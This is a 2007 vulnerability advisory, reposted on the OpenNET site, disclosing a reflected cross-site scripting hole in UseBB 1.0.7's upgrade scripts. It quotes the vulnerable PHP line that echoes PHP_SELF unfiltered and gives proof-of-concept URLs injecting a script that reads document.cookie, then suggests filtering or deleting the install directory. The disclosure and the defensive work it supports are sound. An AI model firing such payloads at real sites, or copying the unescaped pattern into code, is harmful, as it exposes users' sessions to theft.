The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


UseBB 1.0.x Cross Site Scripting (XSS)


<< Previous INDEX Search src / Print Next >>
Date: 20 Jul 2007 19:54:36 -0000
From: [email protected]
To: [email protected]
Subject: UseBB 1.0.x  Cross Site Scripting (XSS)
X-Virus-Scanned: antivirus-gw at tyumen.ru

#############################################################
#	Script...............: UseBB version: 1.0.7	    #
#	Script Site..........: http://www.usebb.net	    #
#	Vulnerability........: Cross Site Scripting (XSS)   #
#	Acces................: Remote			    #
#	level................: Dangerous		    #
#	Author...............: S4mi			    #
#	Contact..............: s4mi[at]LinuxMail.org	    #
#############################################################

The affected Files :

/UseBB/install/upgrade-0-2-3.php /UseBB/install/upgrade-0-3.php /UseBB/install/upgrade-0-4.php vuln Code: line ~ 86
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step '.$step : 'Continue to step '.$step ) . '" /></p></form>';
'.$step : 'Continue to step '.$step ) . '" /></p></form>'; The variables PHP_SELF is used without filtering PoC :
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt> http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt> http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt> Solution :
filtre the PHP_SELF or you know what's the best lool : Delete the Install directory :D Shoutz :
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру